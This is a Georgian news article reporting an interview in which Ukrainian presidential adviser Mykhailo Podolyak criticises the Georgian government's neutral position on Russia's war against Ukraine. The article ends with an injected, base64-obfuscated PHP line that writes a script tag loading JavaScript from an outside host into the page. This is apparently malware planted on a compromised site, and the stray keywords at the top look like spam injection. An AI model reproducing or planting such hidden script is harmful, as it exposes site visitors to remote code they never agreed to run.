celsiusi
ავერსი შნაიდერი
 
საქართველოს ხელისუფლების დღეს არსებული პოზიცია უკრაინისთვის მიუღებელია. ის გაურკვეველი პოზიცია, თუ ვინ არის ამ ომში მართალი, ეს ჩვენთვის ველურად გამოიყურება, – ამის შესახებ უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველი მიხაილო პოდოლიაკი რადიო "მაესტროსთან" ინტერვიუში საუბრობს.
 
მისივე თქმით, რა თქმა უნდა, მისაღებია ის, რასაც ევროპა აკეთებს, თუ საქართველოს არ სურს ევროპის კვალდაკვალ იაროს და სურს ისეთი პოზიცია დაიკავოს, თითქოსდა არ ესმის ომის არსი ეს მხოლოდ და მხოლოდ, საქართველოს არჩევანია.
 
"საქართველოს საზოგადოების, ქართველი ხალხის მიმართ ჩვენ აბსოლუტური თბილი დამოკიდებულება გვაქვს. მე ვერც წარმომიდგენია, ომის პერიოდში ქართველებზე უფრო ახლო ერი ვინ შეიძლება იყოს, რომელმაც 2008 წელს იგივე გამოიარა და უკრაინა მაშინ ქართველ ხალხს ეხმარებოდა. სიმართლე რომ გითხრათ, ჩვენ შოკირებული ვიყავით საქართველოს ხელისუფლების პოზიციით, პრეზიდენტმა არაერთხელ, ერთმნიშვნელოვნად განაცხადა, რომ საქართველოს ხელისუფლების დღეს არსებული პოზიცია უკრაინისთვის მიუღებელია. ის გაურკვეველი პოზიცია, თუ ვინ არის ამ ომში მართალი, ეს ჩვენთვის ველურად გამოიყურება. კიდევ ერთხელ გეტყვით, რომ საქართველოს ხელისუფლებას აქვს უფლება შიდა პოლიტიკური ინტერესებიდან გამომდინარე ესა თუ ის გადაწყვეტილებები მიიღოს და ამა თუ იმ ქვეყნებზე ჰქონდეს ორიენტაცია. ჩვენთვის კი, რა თქმა უნდა, მისაღებია ის, რასაც ევროპა აკეთებს, თუ საქართველოს არ სურს ევროპის კვალდაკვალ იაროს და სურს ისეთი პოზიცია დაიკავოს, თითქოსდა არ ესმის ომის არსი, არ ესმის ის, რომ რუსეთი მოვიდა უკრაინის ტერიტორიაზე, მასობრივად ხოცავს ადამიანებს და ცდილობს ჩვენი ქვეყნის ტერიტორიების მითვისებას, ეს მხოლოდ და მხოლოდ, საქართველოს არჩევანია.  მაგრამ, ჩვენთვის ძალიან უცნაურია საქართველოს ეს არჩევანი, ვინაიდან რუსეთი ყველა შემთხვევაში დამარცხდება, ჩემთვის ძალიან საინტერესო იქნება ვნახო, მას შემდეგ როგორც კი რუსეთი დამარცხდება, იმ ქვეყნების ხელისუფლებები, რომლებიც პირდაპირ თუ ირიბად რუსეთის ფედერაციას მხარს უჭერდნენ", – განაცხადა პოდოლიაკმა. 
 
მან, ასევე აღნიშნა, რომ  განასხვავებს ქაღტველ ხალხს და საქართველოს ხელისუფლებას და დარწმუნებულია რომ ქართველები გულით უკრაინის მხარეს დგანან. 
 
"აქვე მინდა კიდევ ერთხელ განვასხვავო, ქართველები და საქართველოს ხელისუფლება, ჩვენ დარწმუნებული ვართ იმაში, რომ ქართველები გულით უკრაინის მხარეს არიან, ამ მხრივ ჩვენ ეჭვი არ გვაქვს და ეს ძალიან მნიშვნელოვანია, მაგრამ ხელისუფლება, რომელიც ფიქრობს რომ ყველაზე ეშმაკია, ჩამოჯდებიან და ჩუმად დააკვირდებიან ომს, სადღაც ცოტა ფულსაც კი იშოვიან, სადღაც პრინციპიალურ პოზიციას არ დააფიქსირებენ, უკრაინას მხარს არ დაუჭერენ, დღეს რუსეთის მხარდაჭერა არც ეკონომიკურად და არც სტრატეგიულად, არც რეპუტაციული და ისტორიული თვალსაზრისით  არ არის მომგებიანი, შესაბამისად ძალიან მინდა ვნახო ომის დასრულების შემდეგ საქართველოს ხელისუფლება რას იტყვის, რაზე ილაპარაკებს,  დელიკატურად ვიტყვი, ომის დროს ნეიტრალურ პოზიციას რატომ იკავებდა? რატომ არ დადგა ევროპულ, ამერიკის შეერთებული შტატების და უკრაინის მხარეს, ძალიან საინტერესო იქნება მათი მხრიდან გამამართლებელი არგუმენტების მოსმენა. სხვათა შორის, არა მხოლოდ საქართველოს ხელისუფლებისგან, არამედ სხვა ქვეყნებისგან, განსაკუთრებით ომის დაწყების პერიოდში, რატომღაც ჩათვალეს, რომ რუსეთის ფედერაციას ჰქონდა უფლება სუვერენულ ტერიტორიაზე შეჭრის, მოკვლის, გაუპატიურების და დასახიჩრების და იმ პოზიციის დაკავება, რომ ყველაფერი ერთმნიშვნელოვნად არ არის, ეს ყველაფერი იქნება საინტერესო. მაგრამ, კიდევ ერთხელ ხაზს ვუსვამ, რომ სხვადასხვა ინტერპრეტაცია არ მოჰყვეს, საქართველოს შიდა და საგარეო პოლიტიკა მხოლოდ და მხოლოდ საქართველოს ხელისუფლების  პრეროგატივაა, ანუ მას აქვს უფლება  გააკეთოს ის არჩევანი რა არჩევანსაც ის აკეთებს. ეს მათი მოტივია და შემდგომი პასუხისმგებლობაა. უკრაინა ოფიციალურად არანაირ რჩევებს არ იძლევა და არ ახასიათებს ამა თუ იმ ქვეყნის პოზიციას, ჩვენ უბრალოდ დასკვნებს ვაკეთებთ!"– აღნიშნა პოდოლიაკმა. 
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ:
 
 
505
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");